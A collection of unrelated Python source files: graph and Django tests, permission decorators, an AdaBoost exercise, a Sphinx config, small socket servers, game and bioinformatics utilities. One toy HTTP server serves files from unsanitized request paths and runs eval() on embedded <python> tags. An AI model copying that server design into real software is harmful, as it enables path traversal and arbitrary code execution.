suite.run_test(len(app_2.UPA(4, 2)), 4, "Test #4a: 'UPA' method") # here we just check if we get the total 'n' amount of nodes
suite.run_test(len(app_2.random_order({0: set([]), 1: set([]), 2: set([]), 3: set([])})), 4, "Test #4b: 'random_order' method")
# 5. check the basic functions directly
suite.run_test(app_2.targeted_order_fast({0: set([3]), 1: set([2, 3]), 2: set([1, 3]), 3: set([0, 1, 2])}), [3, 1, 0, 2], "Test #5a: 'targeted_order_fast' method")
suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH2), [1, 3, 5, 7, 8, 2, 4, 6], "Test #5b: 'targeted_order_fast' method")
suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH5), ['banana', 'dog', 'cat', 'monkey', 'ape'], "Test #5c: 'targeted_order_fast' method")
suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH8), app_2.targeted_order(test_graphs.GRAPH8), "Test #5d: 'targeted_order_fast' method")
suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH9), app_2.targeted_order(test_graphs.GRAPH9), "Test #5e: 'targeted_order_fast' method")
suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH10), app_2.targeted_order(test_graphs.GRAPH10), "Test #5f: 'targeted_order_fast' method")
suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH10), app_2.targeted_order(test_graphs.GRAPH10), "Test #5g: 'targeted_order_fast' method")
# 6. report number of tests and failures
suite.report_results()
run_suite()
|
from django.contrib.auth.models import User
from django.http import HttpResponseForbidden
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from base_groups.models import BaseGroup, GroupMember
from communities.models import Community
from siteutils.shortcuts import get_object_or_none
class chapter_president_required(object):
"""
Checks to see whether the user is chapter president of this chapter.
Requires that group_slug is first non-request argument. Used with BaseGroup.
Assumptions:
- you can only be an exec member of one chapter
- if you are on the chapter presidents' list, and are an exec of a given
chapter, then you are chapter president of that chapter
"""
def __call__(self, f):
def newf(request, *args, **kwargs):
user = request.user
if user.has_module_perms("base_groups"):
return f(request, *args, **kwargs)
group_slug = kwargs.get('group_slug', None) or (len(args) > 0 and args[0])
if not user.is_authenticated():
# deny access - would set this to redirect
# to a custom template eventually
return render_to_response('denied.html', context_instance=RequestContext(request))
group = get_object_or_404(BaseGroup, slug=group_slug)
if group.model == 'Network':
if group.network.user_is_president(user):
return f(request, *args, **kwargs)
return render_to_response('denied.html', context_instance=RequestContext(request))
return newf
class chapter_exec_required(object):
"""
Checks to see whether the user is an exec of any chapter
"""
def __call__(self, f):
def newf(request, *args, **kwargs):
user = request.user
if user.has_module_perms("base_groups"):
return f(request, *args, **kwargs)
if not user.is_authenticated():
# deny access - would set this to redirect
# to a custom template eventually
return render_to_response('denied.html', context_instance=RequestContext(request))
execlist = get_object_or_none(Community, slug='exec')
if execlist and execlist.user_is_member(user):
return f(request, *args, **kwargs)
return render_to_response('denied.html', context_instance=RequestContext(request))
return newf
|
from django.test import TestCase
from django.test.client import Client
from django.utils import timezone
class TestEntryView(TestCase):
def setUp(self):
self.client = Client()
self.entry_title = 'Jimi hendrix sunshine of your love'
self.entry = "It's getting near dawn,When lights close their tired eyes.I'll soon be with you my love," \
"To give you my dawn surprise.I'll be with you darling soon,I'll be with you when the stars " \
"start falling.I've been waiting so longTo be where I'm goingIn the sunshine of your love.I'm " \
"with you my love,The light's shining through on you.Yes, I'm with you my love,It's the morning " \
"and just we two.I'll stay with you darling now,I'll stay with you till my seas are dried up."
self.color_1 = ' 1'
self.color_2 = '2 '
self.color_3 = ' 3'
self.pub_date = timezone.now()
# TEST TO MAKE SURE THE POST REQUEST IS WORKING
def test_mood_generator_POST_new_mood(self):
response = self.client.post('/api', {
'entry_title': self.entry_title,
'entry': self.entry,
'gradient_color_stop_1': self.color_1,
'gradient_color_stop_2': self.color_1,
'gradient_color_stop_3': self.color_1,
'pub_date': self.pub_date,
})
# CHECK TO MAKE SURE ENTRY WAS CREATED RESPONSE
self.assertEquals(response.status_code, 201)
# TODO / FIND OUT WHY PYCHARM TEST DIFFER FROM TERMINAL
# self.assertEquals(response.data['gradient_color_stop_3'], '#1cc13a')
def test_mood_generator_GET_all_mood(self):
response = self.client.get('/api')
self.assertEquals(response.status_code, 200)
|
# -*- coding: utf-8 -*-
# @Time : 2017/4/13 16:30
# @Author : UNE
# @Site :
# @File : AdaBoosw.py
# @Software: PyCharm
# 《机器学习》(周志华)第八章8.3
"""
编程实现AdaBoosw,以不剪枝决策树为基学习器,在西瓜数据集3.0å上训练一个AdaBoosw集成,并于图8.4作比较
"""
from tool import readxls
import numpy as np
import pandas as pd
from dTree import dTree
if __name__ == '__main__':
data = readxls.excel_table_byname("/Users/JJjie/Desktop/Projects/dataset/西瓜3.xlsx", 0, "Sheet1")
x = pd.DataFrame(data[6:8])
y = pd.DataFrame(data[8])
y = y.T
y_index = y - 1
y = -2 * y + 3 # 将y映射到1,-1
try: # 一维数组的情况
m, n = y.shape
except:
m = 1
n = len(y)
set = np.arange(0, n)
sy = np.zeros((1,17)) # 记录累积分类器的分类
sw = np.ones((1, 17)) / 17 # 样本的权值,初始相同
fenlei = ['√', '×']
shuxing = ['密度', '含糖率']
# 记录每次累积分类器的分类
Res = pd.DataFrame(np.zeros((12,19)),dtype=object,
index=[1,2,3,4,5,6,7,8,9,10,11,12],
columns=[[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,'分类属性','阈值'],
[fenlei[int(y_index[i])] for i in y_index] + ['无','无']])
for i in range(12): # 产生12个分类器
Tree = np.zeros((1,100))
Ptr = 0
Py = np.zeros((1,17))
# 产生决策树基学习器
dtree = dTree(x, y, Py, Ptr, Tree)
# 生成决策树,返回根节点的最优属性和阈值
minn, threshold = dtree.TreeGenerate(0, set, sw, 1)
Py = dtree.Py
print minn, threshold
er = sum(np.dot((Py != y), sw.T))
if er > 0.5 :
break
a = 0.5 * np.log((1 - er) / er)
sw = sw * (np.exp(a * ((Py != y) * 2) - 1).values)
sw = sw / sum(sw[0])
sy = sy + a * Py
for j in range(17):
Res.iloc[i, j] = fenlei[int((1 - np.sign(sy[0][j]))/2)]
Res.iloc[i, 17] = shuxing[minn]
Res.iloc[i, 18] = threshold
print Res |
# -*- coding: utf-8 -*-
#
import inspect
import sys
import os
import sphinx.environment
from docutils.utils import get_source_line
# from mock import Mock as MagicMock
from sphinx.ext.autodoc import cut_lines
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../..'))
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('/usr/local/lib/python3.7/site-packages'))
# -- General configuration ------------------------------------------------
project = 'brutils'
# copyright = '2018, Amelia Brown'
author = 'Amelia Brown'
#
#
# # on_rtd is whether we are on readthedocs.org
# on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
#
# if not on_rtd: # only import and set the theme if we're building docs locally
# import sphinx_rtd_theme
# html_theme = 'sphinx_rtd_theme'
# html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# html_theme = 'python_docs_theme'
# html_theme = 'sphinx_rtd_theme'
# sys.path.insert(0, os.path.abspath('../sphinx_src'))
# import sphinx_scipy_theme
# themedir = os.path.abspath('../sphinx_src')
# html_theme = 'sphinx_scipy_theme'
# html_theme_path = [themedir]
# html_theme_path = [python_docs]
html_theme = 'nature'
#
#
# html_theme_options = {
# "edit_link": False,
# "sidebar": "left",
# "scipy_org_logo": False,
# "rootlinks": []
# }
# html_sidebars = {'index': ['indexsidebar.html', 'searchbox.html']}
#
# html_additional_pages = {
# 'index': 'indexcontent.html',
# }
# html_title = "%s v%s Manual" % (project, version)
# html_static_path = ['sphinx_scipy_theme/static']
# html_last_updated_fmt = '%b %d, %Y'
#
# html_use_modindex = True
# html_copy_source = False
# html_domain_indices = False
# html_file_suffix = '.html'
#
extensions = [
'sphinx.ext.autodoc',
# 'sphinx_autodoc_annotation',
'sphinx.ext.doctest',
'sphinx.ext.napoleon',
# 'numpydoc',
'sphinx.ext.todo',
'sphinx.ext.mathjax',
'sphinx.ext.graphviz',
'sphinx.ext.intersphinx',
'sphinx.ext.linkcode'
]
mathjax_path = ('https://cdn.mathjax.org/mathjax/latest/MathJax.js?'
'config=TeX-AMS-MML_HTMLorMML')
intersphinx_mapping = {
'theano': ('http://theano.readthedocs.org/en/latest/', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None),
'scipy': ('http://docs.scipy.org/doc/scipy/reference/', None),
'python': ('http://docs.python.org/3.7', None)
}
#
autodoc_member_order = 'groupwise' #'bysource'
autoclass_content = 'both'
autodoc_default_flags = ['members','undoc-members']
# autoclass_content = 'both'
#
# class Mock(MagicMock):
# @classmethod
# def __getattr__(cls, name):
# return Mock()
#
#
# MOCK_MODULES = ['fuel']
# sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
graphviz_dot_args = ['-Gbgcolor=#fcfcfc'] # To match the RTD theme
graphviz_output_format = 'svg' # To produce SVG figures
# Render todo lists
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
add_module_names=False
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
# project = u'Blocks'
# copyright = u'2014-2015, Université de Montréal'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# import blocks
# version = '.'.join(blocks.__version__.split('.')[:2])
# # The full version, including alpha/beta/rc tags.
# release = blocks.__version__
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
# html_static_path = ['_static']
#
#
# htmlhelp_basename = 'Blocksdoc'
# -- Options for LaTeX output ---------------------------------------------
def setup(app):
app.connect('autodoc-process-docstring', cut_lines(2, what=['module']))
def linkcode_resolve(domain, info):
"""
Determine the URL corresponding to Python object
"""
if domain != 'py':
return None
modname = info['module']
fullname = info['fullname']
submod = sys.modules.get(modname)
if submod is None:
return None
obj = submod
for part in fullname.split('.'):
try:
obj = getattr(obj, part)
except:
return None
try:
fn = inspect.getsourcefile(obj)
except:
fn = None
if not fn:
return None
try:
source, lineno = inspect.findsource(obj)
except:
lineno = None
if lineno:
linespec = "#L%d" % (lineno + 1)
else:
linespec = ""
# fn = os.path.relpath(fn, start=os.path.dirname(blocks.__file__))
#github = "https://github.com/mila-udem/blocks/blob/master/blocks/{}{}"
# return github.format(fn, linespec)
# Suppress "nonlocal image URI" warnings
# http://stackoverflow.com/questions/12772927
def _warn_node(self, msg, node, **kwargs):
if not msg.startswith('nonlocal image URI found:'):
self._warnfunc(msg, '%s:%s' % get_source_line(node), **kwargs)
sphinx.environment.BuildEnvironment.warn_node = _warn_node
|
import socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 8080))
server.listen(10)
conn,addr = server.accept()
with conn:
res = conn.recv(1024)
print(res.decode("utf-8"))
conn.send(res)
conn.close() |
# SPDX-FileCopyrightText: 2020 - Sebastian Ritter <bastie@users.noreply.github.com>
# SPDX-License-Identifier: Apache-2.0
'''
Created on 01.09.2020
@author: Sͬeͥbͭaͭsͤtͬian
'''
from builtins import staticmethod
from java.nio.file.FileSystem import FileSystem
from java.lang.Object import Object
from java.nio.file.FileSystem import __vampire_DefaulFileSystem__
class FileSystems(Object):
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
@staticmethod
def getDefault() -> FileSystem:
return __vampire_DefaulFileSystem__()
|
import socket # Import socket module
import os
from contextlib import redirect_stdout
def processrequest(request):
req = request.decode("utf-8")
info = req.split(" ")
req_resource = ""
req_type = info[0]
if len(info)>1:
req_resource = info[1]
print(req_resource)
return req_resource
def sendfile(filepath,conn):
img_type = ["ico","jpg","png","gif"]
vid_type = ["mp4"]
l = b"""HTTP/1.1 200 OK"""
filename = filepath.split("/")
if filename == []:
filepath += "index.html"
l+=b"""\nContent-Type: text/html\n\n"""
else:
file_ext = filename[-1].split(".")
if len(file_ext)==1:
filepath += "index.html"
l += b"""\nContent-Type: text/html\n\n"""
else:
if file_ext[1] == "css":
l+=b"""\nContent-Type: text/css\n\n"""
if file_ext[1] in img_type:
l += f"""\nContent-Type: image/{file_ext[1]}\n\n""".encode("utf-8")
if file_ext[1] in vid_type:
l += f"""\nContent-Type: video/{file_ext[1]}\n\n""".encode("utf-8")
if file_ext[1] in "svg":
l += f"""\nContent-Type: image/svg+xml\n\n""".encode("utf-8")
if file_ext[1] in "js":
l += f"""\nContent-Type: text/javascript\n\n""".encode("utf-8")
filename = filepath.split("/")
file_ext = filename[-1].split(".")
try:
f = open(filepath[1:], 'rb')
text = f.read()
if file_ext[-1] == "html":
start = text.find(b"<python>")
temp = text[:start]
stop = text.find(b"</python>")
pyth = text[start+len("<python>"):stop]
pyth = pyth.replace(b" ", b"")
s = pyth.decode()
print(s)
print(pyth)
with open('help.txt', 'w+') as fr:
with redirect_stdout(fr):
eval(s)
fr.seek(0)
ev = fr.read()
t = ev.encode()
temp+=t
temp += text[stop:]
text = temp
l+=text
while (l):
conn.send(l)
l = f.read(1024)
f.close()
except Exception as e:
l = b"""HTTP/1.1 404"""
print(e)
conn.send(l)
port = 12345 # Reserve a port for your service.
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
s.bind(("localhost", port)) # Bind to the port
s.listen(5) # Now wait for client connection.
print('Server listening....')
while True:
conn, addr = s.accept() # Establish connection with client.
print ('Got connection from', addr)
data = conn.recv(1024)
res = processrequest(data)
sendfile(res,conn)
print('Done sending')
conn.close()
|
from ui.pages.inventory_page.SlotsGroup import SlotsGroup
from game_objects.items import ItemTransactions
class SlotMoveMaster:
def __init__(self, gameRoot, page):
self.gameRoot =gameRoot
self.page = page
self.moved_slot = None
self.emty_icon = 'cha_page_elemnt_bg.png'
def move_equip_to_inventory(self, target_item):
target_slot = self.page.inventories.slots.get(target_item.name)
if self.moved_slot is not None and target_slot is not None:
if target_slot.content is not None:
if self.moved_slot.item_type == target_slot.content.item_type:
self.swap_slot(target_slot)
def move_inventory_to_equit(self, target_item):
target_slot = self.page.equipments.slots.get(target_item.name)
if self.moved_slot is not None and target_slot is not None:
if self.moved_slot.content.item_type == target_slot.item_type:
with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
state, msg = self.gameRoot.lengine.the_hero.equipment.equip(self.moved_slot)
self.page.inventories.update_attr()
self.page.equipments.update_attr()
def move_inventory_to_inventory(self, target_item):
target_slot = self.page.inventories.slots.get(target_item.name)
if self.moved_slot is not None and target_slot is not None:
# if target_slot.content is not None:
self.swap_slot(target_slot)
def equip(self, item):
slot = self.page.inventories.slots.get(item.name)
if slot is not None:
if slot.content is not None:
with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
state, msg = self.gameRoot.lengine.the_hero.equipment.equip(slot)
self.page.inventories.update_attr()
self.page.equipments.update_attr()
def unequip(self, item):
slot = self.page.equipments.slots.get(item.name)
if slot is not None:
if slot.content is not None:
with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
self.gameRoot.lengine.the_hero.equipment.unequip_slot(slot)
if slot.content is None:
item.setPixmapIcon(self.page.equipments.default_icons[item.name])
def drop_slot(self):
if self.moved_slot is not None:
with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
self.moved_slot.drop()
self.page.inventories.update_attr()
self.page.equipments.update_attr()
def pop_item(self):
if self.moved_slot is not None:
with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
self.moved_slot.pop_item()
self.page.inventories.update_attr()
def swap_slot(self, target_slot):
if self.moved_slot is not None:
with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
state = target_slot.swap_item(self.moved_slot)
self.page.inventories.update_attr()
self.page.equipments.update_attr()
def buy(self, item):
slot = self.page.shop.slots.get(item.name)
if slot is not None:
if slot.content is not None:
with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
self.gameRoot.game.shop.buy(slot)
if slot.content is None:
self.update_gold_count()
self.page.inventories.update_attr()
item.setPixmapIcon(self.emty_icon)
def update_gold_count(self):
self.page.items['hero_gold_value'].setText(str(self.gameRoot.game.shop.customer.gold))
|
bill_price = int(input('Please enter bill total price : '))
number_of_diners = int(input('Please enter diners number : '))
print('the price for each person is {0}'.format(round(bill_price/number_of_diners,2)))
|
""" Search cell """
import os
import torch
import torch.nn as nn
import numpy as np
import time
from tensorboardX import SummaryWriter
from config import SearchConfig
import utils
from models.search_cnn import SearchCNNController
from architect import Architect
from visualize import plot
from torchsampler import ImbalancedDatasetSampler
config = SearchConfig()
device = torch.device("cuda")
# tensorboard
writer = SummaryWriter(log_dir=os.path.join(config.path, "tb"))
writer.add_text('config', config.as_markdown(), 0)
logger = utils.get_logger(os.path.join(config.path, "{}.log".format(config.name)))
config.print_params(logger.info)
def main():
logger.info("Logger is set - training start")
# set default gpu device id
torch.cuda.set_device(config.gpus[0])
# set seed
np.random.seed(config.seed)
torch.manual_seed(config.seed)
torch.cuda.manual_seed_all(config.seed)
torch.backends.cudnn.benchmark = True
# get data with meta info
input_size, input_channels, n_classes, train_data, valid_data = utils.get_data(
config.dataset, config.data_path, cutout_length=config.cutout_length, validation=True, val_path=config.val_set, fealen=config.fealen, inputsize=config.input_size)
net_crit = nn.CrossEntropyLoss().to(device)
model = SearchCNNController(input_channels, config.init_channels, n_classes, config.layers,
net_crit, device_ids=config.gpus)
model = model.to(device)
# weights optimizer
w_optim = torch.optim.SGD(model.weights(), config.w_lr, momentum=config.w_momentum,
weight_decay=config.w_weight_decay)
# alphas optimizer
alpha_optim = torch.optim.Adam(model.alphas(), config.alpha_lr, betas=(0.5, 0.999),
weight_decay=config.alpha_weight_decay)
# split data to train/validation
# n_train = len(train_data)
# split = n_train // 2
# indices = list(range(n_train))
# train_sampler = torch.utils.data.sampler.SubsetRandomSampler(indices[:split])
# valid_sampler = torch.utils.data.sampler.SubsetRandomSampler(indices[split:])
# train_loader = torch.utils.data.DataLoader(train_data,
# batch_size=config.batch_size,
# sampler=train_sampler,
# num_workers=config.workers,
# pin_memory=True)
# valid_loader = torch.utils.data.DataLoader(train_data,
# batch_size=config.batch_size,
# sampler=valid_sampler,
# num_workers=config.workers,
# pin_memory=True)
train_loader = torch.utils.data.DataLoader(train_data,
batch_size=config.batch_size,
# shuffle=True,
sampler=ImbalancedDatasetSampler(train_data),
num_workers=config.workers,
pin_memory=True,
drop_last=True)
valid_loader = torch.utils.data.DataLoader(valid_data,
batch_size=config.batch_size,
shuffle=False,
num_workers=config.workers,
pin_memory=True,
drop_last=True)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
w_optim, config.epochs, eta_min=config.w_lr_min)
architect = Architect(model, config.w_momentum, config.w_weight_decay)
# training loop
best_top1 = 0.
for epoch in range(config.epochs):
lr_scheduler.step()
lr = lr_scheduler.get_lr()[0]
model.print_alphas(logger)
# training
train(train_loader, valid_loader, model, architect, w_optim, alpha_optim, lr, epoch)
# validation
cur_step = (epoch+1) * len(train_loader)
top1 = validate(valid_loader, model, epoch, cur_step)
# log
# genotype
genotype = model.genotype()
logger.info("genotype = {}".format(genotype))
# genotype as a image
plot_path = os.path.join(config.plot_path, "EP{:02d}".format(epoch+1))
caption = "Epoch {}".format(epoch+1)
plot(genotype.normal, plot_path + "-normal", caption)
plot(genotype.reduce, plot_path + "-reduce", caption)
# save
if best_top1 < top1:
best_top1 = top1
best_genotype = genotype
is_best = True
else:
is_best = False
utils.save_checkpoint(model, config.path, is_best)
print("")
logger.info("Final best Prec@1 = {:.4%}".format(best_top1))
logger.info("Best Genotype = {}".format(best_genotype))
def train(train_loader, valid_loader, model, architect, w_optim, alpha_optim, lr, epoch):
confusion = utils.SumMeter()
losses = utils.AverageMeter()
cur_step = epoch*len(train_loader)
writer.add_scalar('train/lr', lr, cur_step)
model.train()
for step, ((trn_X, trn_y), (val_X, val_y)) in enumerate(zip(train_loader, valid_loader)):
trn_X, trn_y = trn_X.to(device, non_blocking=True), trn_y.to(device, non_blocking=True)
val_X, val_y = val_X.to(device, non_blocking=True), val_y.to(device, non_blocking=True)
N = trn_X.size(0)
# phase 2. architect step (alpha)
alpha_optim.zero_grad()
architect.unrolled_backward(trn_X, trn_y, val_X, val_y, lr, w_optim)
alpha_optim.step()
# phase 1. child network step (w)
w_optim.zero_grad()
logits = model(trn_X)
loss = model.criterion(logits, trn_y)
loss.backward()
# gradient clipping
nn.utils.clip_grad_norm_(model.weights(), config.w_grad_clip)
w_optim.step()
conf_mat = utils.binary_conf_mat(logits, trn_y)
losses.update(loss.item(), N)
confusion.update(conf_mat)
if conf_mat[1, 0] + conf_mat[1, 1] > 0:
recall = conf_mat[1, 1] / (conf_mat[1, 0] + conf_mat[1, 1])
else:
recall = 0
fa = conf_mat[0, 1]
f1_score = utils.binary_f1_score(conf_mat)
if step % config.print_freq == 0 or step == len(train_loader)-1:
logger.info(
"Train: [{:3d}/{}] Step {:03d}/{:03d} Loss: {:.3f} Recall: {:.3f} FA: {:d} F1: {:3f}".format(
epoch+1, config.epochs, step, len(train_loader)-1, losses.avg, recall, fa, f1_score))
logger.info(conf_mat.flatten())
writer.add_scalar('train/loss', loss.item(), cur_step)
# writer.add_scalar('train/top1', prec1.item(), cur_step)
# writer.add_scalar('train/top5', prec5.item(), cur_step)
cur_step += 1
recall = confusion.val[1,1]/(confusion.val[1,0]+confusion.val[1,1])
fa = confusion.val[0,1]
f1_score = utils.binary_f1_score(confusion.val)
logger.info("Train: [{:3d}/{}] Final Recall {:.4%} FA {:d} F1: {:.4%}".format(epoch+1, config.epochs, recall, fa, f1_score))
logger.info(confusion.val.flatten())
def validate(valid_loader, model, epoch, cur_step):
confusion = utils.SumMeter()
losses = utils.AverageMeter()
model.eval()
with torch.no_grad():
start = time.time()
for step, (X, y) in enumerate(valid_loader):
X, y = X.to(device, non_blocking=True), y.to(device, non_blocking=True)
N = X.size(0)
logits = model(X)
loss = model.criterion(logits, y)
conf_mat = utils.binary_conf_mat(logits, y)
losses.update(loss.item(), N)
confusion.update(conf_mat)
if conf_mat[1, 0] + conf_mat[1, 1] > 0:
recall = conf_mat[1, 1] / (conf_mat[1, 0] + conf_mat[1, 1])
else:
recall = 0
fa = conf_mat[0, 1]
f1_score = utils.binary_f1_score(conf_mat)
if step % config.print_freq == 0 or step == len(valid_loader)-1:
logger.info(
"Valid: [{:3d}/{}] Step {:03d}/{:03d} Loss: {:.3f} Recall: {:.3f} FA: {:d} F1: {:3f}".format(
epoch+1, config.epochs, step, len(valid_loader)-1, losses.avg, recall, fa, f1_score))
logger.info(conf_mat.flatten())
val_time = time.time() - start
recall = confusion.val[1,1]/(confusion.val[1,0]+confusion.val[1,1])
fa = confusion.val[0,1]
f1_score = utils.binary_f1_score(confusion.val)
writer.add_scalar('val/loss', losses.avg, epoch)
writer.add_scalar('val/recall', recall, epoch)
writer.add_scalar('val/fa', fa, epoch)
writer.add_scalar('val/f1_score', f1_score, epoch)
logger.info("Valid: [{:3d}/{}] Final Recall {:.4%} FA {:d} F1: {:.4%}".format(epoch+1, config.epochs, recall, fa, f1_score))
logger.info(confusion.val.flatten())
logger.info("Valid: Time Spent: %fs"%val_time)
return f1_score
if __name__ == "__main__":
main()
|
from __future__ import print_function
import os
import os.path as op
import subprocess
import sys
import tempfile
import pandas as pd
from pysam import FastxFile
from viruscope.tools import file_transaction, file_exists
import math
def readfx(fastx):
if not file_exists(fastx):
logger.critical("File Not Found: %s" % fastx)
raise IOError(2, "No such file:", fastx)
fx = ""
try:
fx = FastxFile(fastx)
for f in fx:
yield f.name, f.sequence, f.quality
finally:
if fx:
fx.close()
def read_count(fname):
"""Count the number of reads and write metadata .count file.
Args:
fname (str): fastq or fasta file path
Returns:
read_count (int): integer of number of reads within fasta/fastq file
"""
total_reads = 0
if op.exists(fname) == False:
logger.error("could not find file: %s" % fname)
return 0
count_file = '{}.count'.format(fname)
if op.exists(count_file):
total_reads = open(count_file).read().split("\n")[0]
return total_reads
for name, seq, qual in readfx(fname):
total_reads += 1
try:
with open(count_file, "w") as oh:
print(total_reads, file=oh)
return total_reads
except:
return total_reads
def make_diamond_db(fasta, db, threads=1, verbose=False):
out_file = db + ".dmnd"
if file_exists(out_file):
return db
if verbose:
print("Creating DIAMOND database for", fasta, file=sys.stderr)
with file_transaction(out_file) as tx_out_file:
cmd = ("diamond makedb --in {fasta} -d {db} "
"-p {threads}").format(fasta=fasta,
db=tx_out_file,
threads=threads)
subprocess.check_call(cmd, shell=True)
return db
def diamond_blastx(fasta, out_file, db, threads=1, verbose=False):
if file_exists(out_file):
return out_file
if verbose:
print("Running DIAMOND BLASTX on %s across %s" %
(os.path.basename(fasta), os.path.basename(db)),
file=sys.stderr)
with file_transaction(out_file) as tx_out_file:
cmd = ("diamond blastx -d {db} -q {fasta} "
"-a {out} -p {threads} -t {tmpdir}").format(db=db,
fasta=fasta,
out=tx_out_file,
threads=threads,
tmpdir=tempfile.gettempdir())
subprocess.check_call(cmd, shell=True)
return out_file
def diamond_view(daa, out_file, threads, verbose=False):
''' coverts diamond result to a tabular output '''
if file_exists(out_file):
return out_file
if verbose:
print("Converting DIAMOND database %s to tabular (%s)" %
(os.path.basename(daa), os.path.basename(out_file)),
file=sys.stderr)
with file_transaction(out_file) as tx_out_file:
nongz = tx_out_file.rpartition(".")[0]
subprocess.check_call(["diamond", "view","-a", daa, "-o", nongz])
subprocess.check_call(["gzip", nongz])
return out_file
## stats table construction
def import_diamond_tsv(tsv, pctid=50.0, best_hit=True):
df = pd.read_csv(tsv,
names="qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore".split(),
sep="\t")
df = df[df['pident'] >= pctid]
if best_hit:
df = df.sort_values(by=['qseqid', 'length','bitscore'], ascending=False).drop_duplicates(subset='qseqid', keep='first')
return df
def summarize_by_contig(df, hitscol):
return pd.Series(df.groupby('contig')[hitscol].sum(), name=hitscol)
def contig_lengths(infile):
''' create a dict with contig names as keys and lengths as values from gff or fasta file'''
outdict = {}
if "g" in infile.split(".")[-1]:
filetype = 'gff'
print("looks like input contig file is in gff format.", file=sys.stdout)
elif "f" in infile.split(".")[-1]:
filetype = 'fasta'
print("looks like input config file is in fasta format.", file=sys.stdout)
else:
raise IOError("can't figure out what kind of file contig file is. Make sure it's either in fasta or gff format.", file=sys.stderr)
if filetype == 'gff':
with open(infile) as ih:
for l in ih:
if l.startswith("##sequence-region"):
vec = l.strip().split()
outdict[vec[1]] = vec[-1]
elif filetype == 'fasta':
for name, seq, qual in readfx(infile):
outdict[name] = len(seq)
return outdict
def compute_fr(tbl, clens, mult=1e6):
'''
Args:
tbl: output stats table with mg hit and read counts from diamond recruitment
clens: dict of contig lengths
mult: factor to multiply fraction by to make readiable
Outputs:
pandas DataFrame with mg_fr values calculated
'''
clen_tbl = pd.DataFrame(data={'contig_length':[float(clens[i]) for i in list(clens.keys())], 'contig':list(clens.keys())})
tbl = tbl.merge(clen_tbl, on='contig', how='outer')
hits_cols = [i for i in tbl.columns if 'hit' in i]
count_cols = ["_".join(["reads",i.split("_")[1]]) for i in hits_cols]
for h, c in zip(hits_cols, count_cols):
fr = tbl[h]/(tbl[c] * tbl['contig_length']) * mult
tbl[h.replace("hit_","fr_")] = fr
return tbl
def orf_map(gff):
gdf = pd.read_csv(gff, comment='#', sep="\t", names = ['contig','app','type','start','stop','dot','strand','val','notes']).dropna()
gdf['orf'] = [i.split(";")[0].replace("ID=",'') for i in gdf['notes']]
gdf['len'] = gdf['stop'] - gdf['start']
return gdf[['contig','orf']]
def map_orfs_to_contigs(df, contig_file):
if "g" in contig_file.split(".")[-1]:
gff = True
print("looks like input contig file is in gff format. Will map ORFs to contigs using that.")
else:
print("doesn't look like input contig file is in gff format. Will assume that contig name is embedded in the ORF name.")
gff = False
if gff:
gdf = orf_map(contig_file)
return pd.merge(df, gdf, on='orf', how='outer')
else:
df['contig'] = ["_".join(i.split("_")[:-1]) for i in df['orf']]
return df
def recruit_category(l):
if (l['hit_mg-bac'] > 50) | (l['hit_mg-vir'] > 50):
if l['fr_mg-vir'] > l['fr_mg-bac']:
return 'vir'
else:
return 'bac'
else:
return 'low recruitment'
def construct_recruit_tbl(vir_tsv, bac_tsv, read_count_dict, contig_file):
'''
Args:
vir_tsv: diamond recruitment converted to tsv for vir metagenome
bac_tsv: diamond recruitment converted to tsv for bac metagenome
read_count_dict: dict of mg read counts with two keys -- 'vir_reads' and 'bac_reads'
contig_file: path to a file with sag contigs in it; either in fasta or gff format
Returns:
pandas dataframe with mg fraction calculated
'''
cnames = "qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore".split()
bac_df = import_diamond_tsv(bac_tsv)
vir_df = import_diamond_tsv(vir_tsv)
bac_sum = pd.Series(bac_df.groupby('sseqid')['qseqid'].count(), name='hit_mg-bac')
vir_sum = pd.Series(vir_df.groupby('sseqid')['qseqid'].count(), name='hit_mg-vir')
orfhits = pd.concat([bac_sum, vir_sum], axis=1).reset_index().rename(columns={'index':'orf','sseqid':'orf'})
orfhits = map_orfs_to_contigs(orfhits, contig_file)
chits = pd.concat([summarize_by_contig(orfhits, 'hit_mg-bac'), summarize_by_contig(orfhits, 'hit_mg-vir')], axis=1)
chits['reads_mg-vir'] = float(read_count_dict['vir_reads'])
chits['reads_mg-bac'] = float(read_count_dict['bac_reads'])
clens = contig_lengths(contig_file)
out_tbl = compute_fr(chits.reset_index(), clens, mult=1e6)
out_tbl['ratio_virus_bacteria'] = out_tbl['fr_mg-vir'] / out_tbl['fr_mg-bac']
